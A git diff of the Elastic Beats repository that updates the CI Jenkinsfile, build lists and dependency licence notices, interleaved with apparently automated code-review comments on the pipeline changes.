@@ -1042,7 +975,6 @@ https://github.com/elastic/beats/compare/v7.0.0-alpha2...master[Check the HEAD d *Heartbeat* -- Add support for script processor. {pull}23229[23229] *Winlogbeat* @@ -1057,9 +989,6 @@ https://github.com/elastic/beats/compare/v7.0.0-alpha2...master[Check the HEAD d - Add additional event categorization for security and sysmon modules. {pull}22988[22988] - Add dns.question.subdomain fields for sysmon DNS events. {pull}22999[22999] - Add dns.question.top_level_domain fields for sysmon DNS events. {pull}23046[23046] -- Add Audit and Authentication Polixy Change Events and related.ip information {pull}20684[20684] -- Add new ECS 1.8 improvements. {pull}23563[23563] -- Remove deprecated eventlogging api that was used for Windows XP/2003 and associated unused code. {pull}24463[24463] *Elastic Log Driver* @@ -1070,10 +999,6 @@ https://github.com/elastic/beats/compare/v7.0.0-alpha2...master[Check the HEAD d *Affecting all Beats* -- Selecting `full` in `ssl.verification_mode` option will not treat CommonName field in x509 certificates as - a hostname when Subject Alternative Name is not present from v8.0. - Please update your certificates so it contains at least one DNSName instead of relying on CommonName in the new - major version of Beats. *Filebeat* diff --git a/Jenkinsfile b/Jenkinsfile index 8d4cae09d7e..30479827d91 100644 --- a/Jenkinsfile +++ b/Jenkinsfile @@ -9,6 +9,7 @@ pipeline { AWS_REGION = "${params.awsRegion}" REPO = 'beats' BASE_DIR = "src/github.com/elastic/${env.REPO}" + DOCKERHUB_SECRET = 'secret/observability-team/ci/elastic-observability-dockerhub' DOCKER_ELASTIC_SECRET = 'secret/observability-team/ci/docker-registry/prod' DOCKER_COMPOSE_VERSION = "1.21.0" DOCKER_REGISTRY = 'docker.elastic.co' 
@@ -72,18 +73,20 @@ pipeline { GOFLAGS = '-mod=readonly' } steps { - withGithubNotify(context: "Lint") { - withBeatsEnv(archive: false, id: "lint") { - dumpVariables() - setEnvVar('VERSION', sh(label: 'Get beat version', script: 'make get-version', returnStdout: true)?.trim()) - whenTrue(env.ONLY_DOCS == 'true') { - cmd(label: "make check", script: "make check") - } - whenTrue(env.ONLY_DOCS == 'false') { - cmd(label: "make check-python", script: "make check-python") - cmd(label: "make check-go", script: "make check-go") - cmd(label: "make notice", script: "make notice") - cmd(label: "Check for changes", script: "make check-no-changes") + stageStatusCache(id: 'Lint'){ + withGithubNotify(context: "Lint") { + withBeatsEnv(archive: false, id: "lint") { + dumpVariables() + setEnvVar('VERSION', sh(label: 'Get beat version', script: 'make get-version', returnStdout: true)?.trim()) + whenTrue(env.ONLY_DOCS == 'true') { + cmd(label: "make check", script: "make check") + } + whenTrue(env.ONLY_DOCS == 'false') { + cmd(label: "make check-python", script: "make check-python") + cmd(label: "make check-go", script: "make check-go") + cmd(label: "make notice", script: "make notice") + cmd(label: "Check for changes", script: "make check-no-changes") + } } } } @@ -211,7 +214,7 @@ def generateStages(Map args = [:]) { } def cloud(Map args = [:]) { - withNode(args.label) { + withNode(labels: args.label, sleepMin: 30, sleepMax: 200, forceWorkspace: true){ startCloudTestEnv(name: args.directory, dirs: args.dirs) } withCloudTestEnv() { @@ -226,7 +229,7 @@ def cloud(Map args = [:]) { def k8sTest(Map args = [:]) { def versions = args.versions versions.each{ v -> - withNode(args.label) { + withNode(labels: args.label, sleepMin: 30, sleepMax: 200, forceWorkspace: true){ stage("${args.context} ${v}"){ withEnv(["K8S_VERSION=${v}", "KIND_VERSION=v0.7.0", "KUBECONFIG=${env.WORKSPACE}/kubecfg"]){ withGithubNotify(context: "${args.context} ${v}") { 
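Review bot: The argument set `sleepMin: 30, sleepMax: 200, forceWorkspace: true` is now repeated at each `withNode(...)` call, here in `cloud` and `k8sTest` and again in the `target` hunk, whereas the removed local wrapper kept the delay range in one place. A later change to the range can easily miss one call site, so I would build the arguments once, e.g. `def nodeArgs(label) { [labels: label, sleepMin: 30, sleepMax: 200, forceWorkspace: true] }`, and call `withNode(nodeArgs(args.label)) { ... }`. The lower bound also moved from 10 to 30 and the explanatory doc comment is deleted with the wrapper. A one-line comment such as `// random delay eases gobld scaling; fresh workspace avoids flaky deleteDir on Windows workers` would keep that rationale, assuming the library step behaves like the wrapper it replaces. Both function bodies continue outside the hunks.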
@@ -478,7 +481,7 @@ def target(Map args = [:]) { def isE2E = args.e2e?.get('enabled', false) def isPackaging = args.get('package', false) def dockerArch = args.get('dockerArch', 'amd64') - withNode(args.label) { + withNode(labels: args.label, sleepMin: 30, sleepMax: 200, forceWorkspace: true){ withGithubNotify(context: "${context}") { withBeatsEnv(archive: true, withModule: withModule, directory: directory, id: args.id) { dumpVariables() @@ -505,22 +508,6 @@ def target(Map args = [:]) { } } -/** -* This method wraps the node call for two reasons: -* 1. with some latency to avoid the known issue with the scalabitity in gobld. -* 2. allocate a new workspace to workaround the flakiness of windows workers with deleteDir -*/ -def withNode(String label, Closure body) { - sleep randomNumber(min: 10, max: 200) - // this should workaround the existing issue with reusing workers with the Gobld - def uuid = UUID.randomUUID().toString() - node(label) { - ws("workspace/${JOB_BASE_NAME}-${BUILD_NUMBER}-${uuid}") { - body() - } - } -} - /** * This method wraps all the environment setup and pre-requirements to run any commands. */ @@ -587,6 +574,7 @@ def withBeatsEnv(Map args = [:], Closure body) { ]) { if(isDockerInstalled()) { dockerLogin(secret: "${DOCKER_ELASTIC_SECRET}", registry: "${DOCKER_REGISTRY}") + dockerLogin(secret: "${DOCKERHUB_SECRET}", registry: 'docker.io') } dir("${env.BASE_DIR}") { installTools(args) @@ -736,10 +724,11 @@ def archiveTestOutput(Map args = [:]) { * disk space of the jenkins instance */ def tarAndUploadArtifacts(Map args = [:]) { - tar(file: args.file, dir: args.location, archive: false, allowMissing: true) + def fileName = args.file.replaceAll('[^A-Za-z-0-9]','-') + tar(file: fileName, dir: args.location, archive: false, allowMissing: true) googleStorageUploadExt(bucket: "gs://${JOB_GCS_BUCKET}/${env.JOB_NAME}-${env.BUILD_ID}", credentialsId: "${JOB_GCS_EXT_CREDENTIALS}", - pattern: "${args.file}", + pattern: "${fileName}", sharedPublicly: true) } 
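Review bot: The added `dockerLogin(secret: "${DOCKERHUB_SECRET}", registry: 'docker.io')` runs on every `withBeatsEnv` invocation, so a Docker Hub credential now lands on each worker that has Docker, whether or not the stage pulls anything from docker.io. If these stages also build pull-request code (the trigger configuration is not in this diff), that code runs beside a logged-in Docker client. The Vault entry should therefore hold a pull-only token, and the purpose should be stated at the call, e.g. `// Docker Hub login is for authenticated pulls only; the secret must not carry push rights`. It is also a new hard dependency: presumably a failed login now fails the whole environment setup, which is worth confirming. `withBeatsEnv` starts and ends outside the hunk.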
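Review bot: The pattern in `def fileName = args.file.replaceAll('[^A-Za-z-0-9]','-')` replaces `.` as well, so an archive name with an extension loses it (constructed example: `test-output.tgz` becomes `test-output-tgz`), and the `-` between `a-z` and `0-9` reads like a mistyped range. Listing the allowed characters explicitly is clearer and keeps the extension while still removing path separators: `def fileName = args.file.replaceAll('[^A-Za-z0-9._-]', '-')`. `args.file` is dereferenced without a null check, so a caller that omits `file` now fails here rather than in `tar`. Since the upload below is `sharedPublicly: true`, a short comment on what `args.location` may contain would help reviewers confirm that nothing sensitive is archived.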
@@ -956,40 +945,42 @@ class RunCommand extends co.elastic.beats.BeatsFunction { super(args) } public run(Map args = [:]){ - def withModule = args.content.get('withModule', false) - if(args?.content?.containsKey('make')) { - steps.target(context: args.context, command: args.content.make, directory: args.project, label: args.label, withModule: withModule, isMage: false, id: args.id) - } - if(args?.content?.containsKey('mage')) { - steps.target(context: args.context, command: args.content.mage, directory: args.project, label: args.label, withModule: withModule, isMage: true, id: args.id) - } - if(args?.content?.containsKey('packaging-arm')) { - steps.packagingArm(context: args.context, - command: args.content.get('packaging-arm'), - directory: args.project, - label: args.label, - isMage: true, - id: args.id, - e2e: args.content.get('e2e'), - package: true, - dockerArch: 'arm64') - } - if(args?.content?.containsKey('packaging-linux')) { - steps.packagingLinux(context: args.context, - command: args.content.get('packaging-linux'), + steps.stageStatusCache(args){ + def withModule = args.content.get('withModule', false) + if(args?.content?.containsKey('make')) { + steps.target(context: args.context, command: args.content.make, directory: args.project, label: args.label, withModule: withModule, isMage: false, id: args.id) + } + if(args?.content?.containsKey('mage')) { + steps.target(context: args.context, command: args.content.mage, directory: args.project, label: args.label, withModule: withModule, isMage: true, id: args.id) + } + if(args?.content?.containsKey('packaging-arm')) { + steps.packagingArm(context: args.context, + command: args.content.get('packaging-arm'), directory: args.project, label: args.label, isMage: true, id: args.id, e2e: args.content.get('e2e'), package: true, - dockerArch: 'amd64') - } - if(args?.content?.containsKey('k8sTest')) { - steps.k8sTest(context: args.context, versions: args.content.k8sTest.split(','), label: args.label, id: args.id) - } - 
if(args?.content?.containsKey('cloud')) { - steps.cloud(context: args.context, command: args.content.cloud, directory: args.project, label: args.label, withModule: withModule, dirs: args.content.dirs, id: args.id) + dockerArch: 'arm64') + } + if(args?.content?.containsKey('packaging-linux')) { + steps.packagingLinux(context: args.context, + command: args.content.get('packaging-linux'), + directory: args.project, + label: args.label, + isMage: true, + id: args.id, + e2e: args.content.get('e2e'), + package: true, + dockerArch: 'amd64') + } + if(args?.content?.containsKey('k8sTest')) { + steps.k8sTest(context: args.context, versions: args.content.k8sTest.split(','), label: args.label, id: args.id) + } + if(args?.content?.containsKey('cloud')) { + steps.cloud(context: args.context, command: args.content.cloud, directory: args.project, label: args.label, withModule: withModule, dirs: args.content.dirs, id: args.id) + } } } } diff --git a/Jenkinsfile.yml b/Jenkinsfile.yml index 284000da86f..35f682a9714 100644 --- a/Jenkinsfile.yml +++ b/Jenkinsfile.yml @@ -17,6 +17,7 @@ projects: - "x-pack/heartbeat" - "x-pack/libbeat" - "x-pack/metricbeat" + - "x-pack/osquerybeat" - "x-pack/packetbeat" - "x-pack/winlogbeat" - "dev-tools" diff --git a/Makefile b/Makefile index 6080779c7bb..1b6f0251f53 100644 --- a/Makefile +++ b/Makefile @@ -1,6 +1,6 @@ BUILD_DIR=$(CURDIR)/build COVERAGE_DIR=$(BUILD_DIR)/coverage -BEATS?=auditbeat filebeat heartbeat journalbeat metricbeat packetbeat winlogbeat x-pack/functionbeat x-pack/elastic-agent +BEATS?=auditbeat filebeat heartbeat journalbeat metricbeat packetbeat winlogbeat x-pack/functionbeat x-pack/elastic-agent x-pack/osquerybeat PROJECTS=libbeat $(BEATS) PROJECTS_ENV=libbeat filebeat metricbeat PYTHON_ENV?=$(BUILD_DIR)/python-env diff --git a/NOTICE.txt b/NOTICE.txt index 6e184407644..db86aec50f9 100644 --- a/NOTICE.txt +++ b/NOTICE.txt 
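Review bot: `steps.stageStatusCache(args)` in `RunCommand.run` receives the whole `args` map, while the Lint stage calls the same step as `stageStatusCache(id: 'Lint')`. If the step keys its cache on `id` (assumed; the step is defined outside this diff), two stages sharing an `args.id` would skip each other's work once one has succeeded. I would pass only the key, `steps.stageStatusCache(id: args.id){`, and add a comment naming the key and stating that a cached success skips every `make`/`mage`/packaging command in the block. Inside the wrapped body, `args.content.get('withModule', false)` is dereferenced without `?.` while every following check uses `args?.content?`; `def withModule = args?.content?.get('withModule', false)` would match them.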
@@ -6103,11 +6103,11 @@ Contents of probable licence file $GOMODCACHE/github.com/elastic/ecs@v1.8.0/LICE -------------------------------------------------------------------------------- Dependency : github.com/elastic/elastic-agent-client/v7 -Version: v7.0.0-20200709172729-d43b7ad5833a +Version: v7.0.0-20210308165121-7dd05ee2b5a5 Licence type (autodetected): Elastic -------------------------------------------------------------------------------- -Contents of probable licence file $GOMODCACHE/github.com/elastic/elastic-agent-client/v7@v7.0.0-20200709172729-d43b7ad5833a/LICENSE.txt: +Contents of probable licence file $GOMODCACHE/github.com/elastic/elastic-agent-client/v7@v7.0.0-20210308165121-7dd05ee2b5a5/LICENSE.txt: ELASTIC LICENSE AGREEMENT @@ -8299,11 +8299,11 @@ Contents of probable licence file $GOMODCACHE/github.com/elastic/go-ucfg@v0.8.3/ -------------------------------------------------------------------------------- Dependency : github.com/elastic/gosigar -Version: v0.14.0 +Version: v0.14.1 Licence type (autodetected): Apache-2.0 -------------------------------------------------------------------------------- -Contents of probable licence file $GOMODCACHE/github.com/elastic/gosigar@v0.14.0/LICENSE: +Contents of probable licence file $GOMODCACHE/github.com/elastic/gosigar@v0.14.1/LICENSE: Apache License Version 2.0, January 2004 @@ -9446,11 +9446,11 @@ OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. -------------------------------------------------------------------------------- Dependency : github.com/golang/protobuf -Version: v1.4.2 +Version: v1.4.3 Licence type (autodetected): BSD-3-Clause -------------------------------------------------------------------------------- -Contents of probable licence file $GOMODCACHE/github.com/golang/protobuf@v1.4.2/LICENSE: +Contents of probable licence file $GOMODCACHE/github.com/golang/protobuf@v1.4.3/LICENSE: Copyright 2010 The Go Authors. All rights reserved. 
@@ -9995,11 +9995,11 @@ OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. -------------------------------------------------------------------------------- Dependency : github.com/google/uuid -Version: v1.1.2-0.20190416172445-c2e93f3ae59f +Version: v1.1.2 Licence type (autodetected): BSD-3-Clause -------------------------------------------------------------------------------- -Contents of probable licence file $GOMODCACHE/github.com/google/uuid@v1.1.2-0.20190416172445-c2e93f3ae59f/LICENSE: +Contents of probable licence file $GOMODCACHE/github.com/google/uuid@v1.1.2/LICENSE: Copyright (c) 2009,2014 Google Inc. All rights reserved. 
@@ -11809,6 +11809,24 @@ freely, subject to the following restrictions: distribution. +-------------------------------------------------------------------------------- +Dependency : github.com/kolide/osquery-go +Version: v0.0.0-20200604192029-b019be7063ac +Licence type (autodetected): MIT +-------------------------------------------------------------------------------- + +Contents of probable licence file $GOMODCACHE/github.com/kolide/osquery-go@v0.0.0-20200604192029-b019be7063ac/LICENSE: + +MIT License + +Copyright 2017 Kolide Inc. + +Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: + +The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. + +THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. + -------------------------------------------------------------------------------- Dependency : github.com/lib/pq Version: v1.1.2-0.20190507191818-2ff3cb3adc01 
@@ -16122,11 +16140,11 @@ OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. -------------------------------------------------------------------------------- Dependency : golang.org/x/net -Version: v0.0.0-20200904194848-62affa334b73 +Version: v0.0.0-20210226172049-e18ecbb05110 Licence type (autodetected): BSD-3-Clause -------------------------------------------------------------------------------- -Contents of probable licence file $GOMODCACHE/golang.org/x/net@v0.0.0-20200904194848-62affa334b73/LICENSE: +Contents of probable licence file $GOMODCACHE/golang.org/x/net@v0.0.0-20210226172049-e18ecbb05110/LICENSE: Copyright (c) 2009 The Go Authors. All rights reserved. @@ -16233,11 +16251,11 @@ OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. -------------------------------------------------------------------------------- Dependency : golang.org/x/sys -Version: v0.0.0-20201009025420-dfb3f7c4e634 +Version: v0.0.0-20210308170721-88b6017d0656 Licence type (autodetected): BSD-3-Clause -------------------------------------------------------------------------------- -Contents of probable licence file $GOMODCACHE/golang.org/x/sys@v0.0.0-20201009025420-dfb3f7c4e634/LICENSE: +Contents of probable licence file $GOMODCACHE/golang.org/x/sys@v0.0.0-20210308170721-88b6017d0656/LICENSE: Copyright (c) 2009 The Go Authors. All rights reserved. @@ -16270,11 +16288,11 @@ OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. -------------------------------------------------------------------------------- Dependency : golang.org/x/text -Version: v0.3.3 +Version: v0.3.5 Licence type (autodetected): BSD-3-Clause -------------------------------------------------------------------------------- -Contents of probable licence file $GOMODCACHE/golang.org/x/text@v0.3.3/LICENSE: +Contents of probable licence file $GOMODCACHE/golang.org/x/text@v0.3.5/LICENSE: Copyright (c) 2009 The Go Authors. All rights reserved. 
@@ -16418,11 +16436,11 @@ OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. -------------------------------------------------------------------------------- Dependency : google.golang.org/genproto -Version: v0.0.0-20200526211855-cb27e3aa2013 +Version: v0.0.0-20210303154014-9728d6b83eeb Licence type (autodetected): Apache-2.0 -------------------------------------------------------------------------------- -Contents of probable licence file $GOMODCACHE/google.golang.org/genproto@v0.0.0-20200526211855-cb27e3aa2013/LICENSE: +Contents of probable licence file $GOMODCACHE/google.golang.org/genproto@v0.0.0-20210303154014-9728d6b83eeb/LICENSE: Apache License @@ -16842,11 +16860,11 @@ Contents of probable licence file $GOMODCACHE/google.golang.org/grpc@v1.29.1/LIC -------------------------------------------------------------------------------- Dependency : google.golang.org/protobuf -Version: v1.24.0 +Version: v1.25.0 Licence type (autodetected): BSD-3-Clause -------------------------------------------------------------------------------- -Contents of probable licence file $GOMODCACHE/google.golang.org/protobuf@v1.24.0/LICENSE: +Contents of probable licence file $GOMODCACHE/google.golang.org/protobuf@v1.25.0/LICENSE: Copyright (c) 2018 The Go Authors. All rights reserved. 
@@ -21090,6 +21108,322 @@ The above copyright notice and this permission notice shall be included in all c THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. +-------------------------------------------------------------------------------- +Dependency : github.com/apache/thrift +Version: v0.13.1-0.20200603211036-eac4d0c79a5f +Licence type (autodetected): Apache-2.0 +-------------------------------------------------------------------------------- + +Contents of probable licence file $GOMODCACHE/github.com/apache/thrift@v0.13.1-0.20200603211036-eac4d0c79a5f/LICENSE: + + + Apache License + Version 2.0, January 2004 + http://www.apache.org/licenses/ + + TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION + + 1. Definitions. + + "License" shall mean the terms and conditions for use, reproduction, + and distribution as defined by Sections 1 through 9 of this document. + + "Licensor" shall mean the copyright owner or entity authorized by + the copyright owner that is granting the License. + + "Legal Entity" shall mean the union of the acting entity and all + other entities that control, are controlled by, or are under common + control with that entity. For the purposes of this definition, + "control" means (i) the power, direct or indirect, to cause the + direction or management of such entity, whether by contract or + otherwise, or (ii) ownership of fifty percent (50%) or more of the + outstanding shares, or (iii) beneficial ownership of such entity. 
+ + "You" (or "Your") shall mean an individual or Legal Entity + exercising permissions granted by this License. + + "Source" form shall mean the preferred form for making modifications, + including but not limited to software source code, documentation + source, and configuration files. + + "Object" form shall mean any form resulting from mechanical + transformation or translation of a Source form, including but + not limited to compiled object code, generated documentation, + and conversions to other media types. + + "Work" shall mean the work of authorship, whether in Source or + Object form, made available under the License, as indicated by a + copyright notice that is included in or attached to the work + (an example is provided in the Appendix below). + + "Derivative Works" shall mean any work, whether in Source or Object + form, that is based on (or derived from) the Work and for which the + editorial revisions, annotations, elaborations, or other modifications + represent, as a whole, an original work of authorship. For the purposes + of this License, Derivative Works shall not include works that remain + separable from, or merely link (or bind by name) to the interfaces of, + the Work and Derivative Works thereof. + + "Contribution" shall mean any work of authorship, including + the original version of the Work and any modifications or additions + to that Work or Derivative Works thereof, that is intentionally + submitted to Licensor for inclusion in the Work by the copyright owner + or by an individual or Legal Entity authorized to submit on behalf of + the copyright owner. 
For the purposes of this definition, "submitted" + means any form of electronic, verbal, or written communication sent + to the Licensor or its representatives, including but not limited to + communication on electronic mailing lists, source code control systems, + and issue tracking systems that are managed by, or on behalf of, the + Licensor for the purpose of discussing and improving the Work, but + excluding communication that is conspicuously marked or otherwise + designated in writing by the copyright owner as "Not a Contribution." + + "Contributor" shall mean Licensor and any individual or Legal Entity + on behalf of whom a Contribution has been received by Licensor and + subsequently incorporated within the Work. + + 2. Grant of Copyright License. Subject to the terms and conditions of + this License, each Contributor hereby grants to You a perpetual, + worldwide, non-exclusive, no-charge, royalty-free, irrevocable + copyright license to reproduce, prepare Derivative Works of, + publicly display, publicly perform, sublicense, and distribute the + Work and such Derivative Works in Source or Object form. + + 3. Grant of Patent License. Subject to the terms and conditions of + this License, each Contributor hereby grants to You a perpetual, + worldwide, non-exclusive, no-charge, royalty-free, irrevocable + (except as stated in this section) patent license to make, have made, + use, offer to sell, sell, import, and otherwise transfer the Work, + where such license applies only to those patent claims licensable + by such Contributor that are necessarily infringed by their + Contribution(s) alone or by combination of their Contribution(s) + with the Work to which such Contribution(s) was submitted. 
If You + institute patent litigation against any entity (including a + cross-claim or counterclaim in a lawsuit) alleging that the Work + or a Contribution incorporated within the Work constitutes direct + or contributory patent infringement, then any patent licenses + granted to You under this License for that Work shall terminate + as of the date such litigation is filed. + + 4. Redistribution. You may reproduce and distribute copies of the + Work or Derivative Works thereof in any medium, with or without + modifications, and in Source or Object form, provided that You + meet the following conditions: + + (a) You must give any other recipients of the Work or + Derivative Works a copy of this License; and + + (b) You must cause any modified files to carry prominent notices + stating that You changed the files; and + + (c) You must retain, in the Source form of any Derivative Works + that You distribute, all copyright, patent, trademark, and + attribution notices from the Source form of the Work, + excluding those notices that do not pertain to any part of + the Derivative Works; and + + (d) If the Work includes a "NOTICE" text file as part of its + distribution, then any Derivative Works that You distribute must + include a readable copy of the attribution notices contained + within such NOTICE file, excluding those notices that do not + pertain to any part of the Derivative Works, in at least one + of the following places: within a NOTICE text file distributed + as part of the Derivative Works; within the Source form or + documentation, if provided along with the Derivative Works; or, + within a display generated by the Derivative Works, if and + wherever such third-party notices normally appear. The contents + of the NOTICE file are for informational purposes only and + do not modify the License. 
You may add Your own attribution + notices within Derivative Works that You distribute, alongside + or as an addendum to the NOTICE text from the Work, provided + that such additional attribution notices cannot be construed + as modifying the License. + + You may add Your own copyright statement to Your modifications and + may provide additional or different license terms and conditions + for use, reproduction, or distribution of Your modifications, or + for any such Derivative Works as a whole, provided Your use, + reproduction, and distribution of the Work otherwise complies with + the conditions stated in this License. + + 5. Submission of Contributions. Unless You explicitly state otherwise, + any Contribution intentionally submitted for inclusion in the Work + by You to the Licensor shall be under the terms and conditions of + this License, without any additional terms or conditions. + Notwithstanding the above, nothing herein shall supersede or modify + the terms of any separate license agreement you may have executed + with Licensor regarding such Contributions. + + 6. Trademarks. This License does not grant permission to use the trade + names, trademarks, service marks, or product names of the Licensor, + except as required for reasonable and customary use in describing the + origin of the Work and reproducing the content of the NOTICE file. + + 7. Disclaimer of Warranty. Unless required by applicable law or + agreed to in writing, Licensor provides the Work (and each + Contributor provides its Contributions) on an "AS IS" BASIS, + WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or + implied, including, without limitation, any warranties or conditions + of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A + PARTICULAR PURPOSE. You are solely responsible for determining the + appropriateness of using or redistributing the Work and assume any + risks associated with Your exercise of permissions under this License. + + 8. 
Limitation of Liability. In no event and under no legal theory, + whether in tort (including negligence), contract, or otherwise, + unless required by applicable law (such as deliberate and grossly + negligent acts) or agreed to in writing, shall any Contributor be + liable to You for damages, including any direct, indirect, special, + incidental, or consequential damages of any character arising as a + result of this License or out of the use or inability to use the + Work (including but not limited to damages for loss of goodwill, + work stoppage, computer failure or malfunction, or any and all + other commercial damages or losses), even if such Contributor + has been advised of the possibility of such damages. + + 9. Accepting Warranty or Additional Liability. While redistributing + the Work or Derivative Works thereof, You may choose to offer, + and charge a fee for, acceptance of support, warranty, indemnity, + or other liability obligations and/or rights consistent with this + License. However, in accepting such obligations, You may act only + on Your own behalf and on Your sole responsibility, not on behalf + of any other Contributor, and only if You agree to indemnify, + defend, and hold each Contributor harmless for any liability + incurred by, or claims asserted against, such Contributor by reason + of your accepting any such warranty or additional liability. + + END OF TERMS AND CONDITIONS + + APPENDIX: How to apply the Apache License to your work. + + To apply the Apache License to your work, attach the following + boilerplate notice, with the fields enclosed by brackets "[]" + replaced with your own identifying information. (Don't include + the brackets!) The text should be enclosed in the appropriate + comment syntax for the file format. We also recommend that a + file or class name and description of purpose be included on the + same "printed page" as the copyright notice for easier + identification within third-party archives. 
+ + Copyright [yyyy] [name of copyright owner] + + Licensed under the Apache License, Version 2.0 (the "License"); + you may not use this file except in compliance with the License. + You may obtain a copy of the License at + + http://www.apache.org/licenses/LICENSE-2.0 + + Unless required by applicable law or agreed to in writing, software + distributed under the License is distributed on an "AS IS" BASIS, + WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + See the License for the specific language governing permissions and + limitations under the License. + +-------------------------------------------------- +SOFTWARE DISTRIBUTED WITH THRIFT: + +The Apache Thrift software includes a number of subcomponents with +separate copyright notices and license terms. Your use of the source +code for the these subcomponents is subject to the terms and +conditions of the following licenses. + +-------------------------------------------------- +Portions of the following files are licensed under the MIT License: + + lib/erl/src/Makefile.am + +Please see doc/otp-base-license.txt for the full terms of this license. + +-------------------------------------------------- +For the aclocal/ax_boost_base.m4 and contrib/fb303/aclocal/ax_boost_base.m4 components: + +# Copyright (c) 2007 Thomas Porschberg +# +# Copying and distribution of this file, with or without +# modification, are permitted in any medium without royalty provided +# the copyright notice and this notice are preserved. + +-------------------------------------------------- +For the lib/nodejs/lib/thrift/json_parse.js: + +/* + json_parse.js + 2015-05-02 + Public Domain. + NO WARRANTY EXPRESSED OR IMPLIED. USE AT YOUR OWN RISK. + +*/ +(By Douglas Crockford ) + +-------------------------------------------------- +For lib/cpp/src/thrift/windows/SocketPair.cpp + +/* socketpair.c + * Copyright 2007 by Nathan C. Myers ; some rights reserved. + * This code is Free Software. 
It may be copied freely, in original or + * modified form, subject only to the restrictions that (1) the author is + * relieved from all responsibilities for any use for any purpose, and (2) + * this copyright notice must be retained, unchanged, in its entirety. If + * for any reason the author might be held responsible for any consequences + * of copying or use, license is withheld. + */ + + +-------------------------------------------------- +For lib/py/compat/win32/stdint.h + +// ISO C9x compliant stdint.h for Microsoft Visual Studio +// Based on ISO/IEC 9899:TC2 Committee draft (May 6, 2005) WG14/N1124 +// +// Copyright (c) 2006-2008 Alexander Chemeris +// +// Redistribution and use in source and binary forms, with or without +// modification, are permitted provided that the following conditions are met: +// +// 1. Redistributions of source code must retain the above copyright notice, +// this list of conditions and the following disclaimer. +// +// 2. Redistributions in binary form must reproduce the above copyright +// notice, this list of conditions and the following disclaimer in the +// documentation and/or other materials provided with the distribution. +// +// 3. The name of the author may be used to endorse or promote products +// derived from this software without specific prior written permission. +// +// THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR IMPLIED +// WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF +// MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. 
IN NO +// EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, +// SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, +// PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; +// OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, +// WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR +// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF +// ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. +// +/////////////////////////////////////////////////////////////////////////////// + + +-------------------------------------------------- +Codegen template in t_html_generator.h + +* Bootstrap v2.0.3 +* +* Copyright 2012 Twitter, Inc +* Licensed under the Apache License v2.0 +* http://www.apache.org/licenses/LICENSE-2.0 +* +* Designed and built with all the love in the world @twitter by @mdo and @fat. + +--------------------------------------------------- +For t_cl_generator.cc + + * Copyright (c) 2008- Patrick Collison + * Copyright (c) 2006- Facebook + +--------------------------------------------------- + + -------------------------------------------------------------------------------- Dependency : github.com/apoydence/eachers Version: v0.0.0-20181020210610-23942921fe77 
